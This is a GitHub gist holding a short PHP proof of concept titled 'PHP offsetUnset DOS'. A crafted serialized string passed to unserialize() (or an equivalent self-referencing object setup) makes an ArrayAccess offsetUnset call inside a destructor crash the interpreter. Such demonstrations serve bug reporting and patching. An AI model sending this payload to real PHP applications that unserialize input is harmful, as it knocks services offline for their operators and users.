Skip to content

Instantly share code, notes, and snippets.

@dsadyrin
Created May 13, 2022 08:04
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save dsadyrin/2da94278edc7988b47e1a8e0ce9758a2 to your computer and use it in GitHub Desktop.
PHP offsetUnset DOS
<?php
class Obj implements ArrayAccess {
public function offsetExists($key) {
return true;
}
public function offsetSet($key, $value) { }
public function offsetGet($key) {
}
public function offsetUnset($key) {
unset($this->data[123]); //any offset, need an object property
return 1;
return;
}
}
class A {
function __destruct() {
unset( $this->config['username'] ) ;
}
}
unserialize('O:1:"A":1:{s:6:"config";O:3:"Obj":1:{s:4:"data";R:2;}}');
/*
//If you don't consider code with unserialize function call as security issue, use the code below to trigger the bug.
$o1 = new Obj;
$o1->data = &$o1;
$o2 = new A();
$o2->config = $o1;
*/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment